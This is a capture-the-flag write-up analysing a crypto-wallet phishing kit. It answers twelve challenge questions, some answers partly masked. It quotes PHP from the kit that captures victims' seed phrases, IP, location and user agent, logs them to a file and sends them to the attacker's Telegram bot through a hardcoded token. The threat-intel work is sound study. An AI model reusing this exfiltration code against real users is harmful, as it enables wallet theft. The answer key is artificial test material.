
3 minute read



An attacker compromised a server and impersonated, a decentralized exchange native to BNB Chain, to host a phishing kit at The attacker set it as an open directory with the file name

Provided the phishing kit, you as a soc analyst are requested to analyze it and do your threat intel homework.

Author: Milann SHRESTHA
Difficulty: Easy


We start by unzipping the file named, which has been provided, using as password.

Q1: Which wallet is used for asking the seed phrase?

After decompressing, we are left with some files including an HTML file, exploring the content we see some wallets, only one of these wallets matches

alt text

Exploring the code, We see that only one wallet that has a “onclick” event for its buttons is MetaMask which uses JavaScript (vib(1); jj2 = true; jj = true;). This is commonly designed for asking the seed phrase.

alt text alt text alt text

Answer: Meta****

Q2: What is the file name that has the code for the phishing kit?

Opening the Metamask folder, there are three files:

  • Fonts
  • index.html
  • metamask.php

Inside the metamask.php, we see thee following code:

$date = date("m.d.Y");
$message = "<b>Welcome 2 The Jungle </b> 
<b>Wallet:</b> Metamask
<b>Phrase:</b> <code>" . $_POST["data"] . "</code>
<b>IP:</b> " .$_SERVER['REMOTE_ADDR'] . " | " .$geo. " | " .$city. "
<b>User:</b> " . $_SERVER['HTTP_USER_AGENT'] . "";

This constructs an HTML-formatted message containing:

  • The wallet type (MetaMask is hardcoded).
  • The recovery phrase entered by the victim $_POST["data"].
  • The attacker captures this phrase, which can be used to take full control of the victim’s wallet.
  • The IP address, geolocation (country and city), and the user-agent string (browser and device information).

So, this is the file that has the code for the phishing kit.

Answer: Meta****.php

Q3: In which language was the kit written?

Answer: PHP

Q4: What service does the kit use to retrieve the victim’s machine information?

At the beginning the code, we see the following block:

$request = file_get_contents("".$_SERVER['REMOTE_ADDR']); 
$array = json_decode($request);
$geo = $array->country->name_en;
$city = $array->city->name_en;

This block of code uses the Sypex Geo API to retrieve the geolocation of the user based on their IP address $_SERVER['REMOTE_ADDR'], The country and city names are extracted and stored in $geo and $city.

Answer: Sy*** G**

Q5: How many seed phrases were already collected?

later in the code, we see this block:

$_POST["import-account__secret-phrase"]. $text = $_POST['data']."\n";
@file_put_contents($_SERVER['DOCUMENT_ROOT'].'/log/'.'log.txt', $text, FILE_APPEND);	

Which is used to ensures the attacker has a backup of the stolen phrases, the recovery phrase $_POST['data'] is also logged locally in a file log.txt on the server.

Now, we go the log.txt, we see that it has 3 already collected phrases:

alt text

Answer: 3

Q6: Write down the seed phrase of the most recent phishing incident?

Answer: father also recycle ******** ******** ******** ******** ******** ******** ******** ********

Q7: Which medium had been used for credential dumping?

The following block of code uses the sendTel() function to send a crafted message to a Telegram chat.

The Telegram Bot API is used here. The bot token $token and chat ID $id are hardcoded.

It constructs the Telegram API URL and uses file_get_contents() to send the message via the bot, delivering the stolen information (recovery phrase, IP, etc.) to the attacker’s Telegram account.

function sendTel($message){
    $id = "5442785564"; 
    $token = "5457463144:AAG8t4k7e2ew3tTi0IBShcWbSia0Irvxm10"; 
    $filename = "".$token."/sendMessage?chat_id=".$id."&text=".urlencode($message)."&parse_mode=html";

Answer: Tele****

Q8: What is the token for the channel?

Answer: 5457463144:AAG8t4k7e2e************************

Q9: What is the chat ID of the phisher’s channel?

Answer: 5442******

Q10: What are the allies of the phish kit developer?

The attacker had fingerprinted his code with the following greeting message:

 With love and respect to all the hustler out there,
 This is a small gift to my brothers,
 All the best with your luck,

Answer: j1j1b1s@****

Q11: What is the full name of the Phish Actor?

Using the following request to the getChat method:

The response is:

alt text

Answer: Mar*** Aure****lius****

Q12: What is the username of the Phish Actor?

Answer: pumpkin****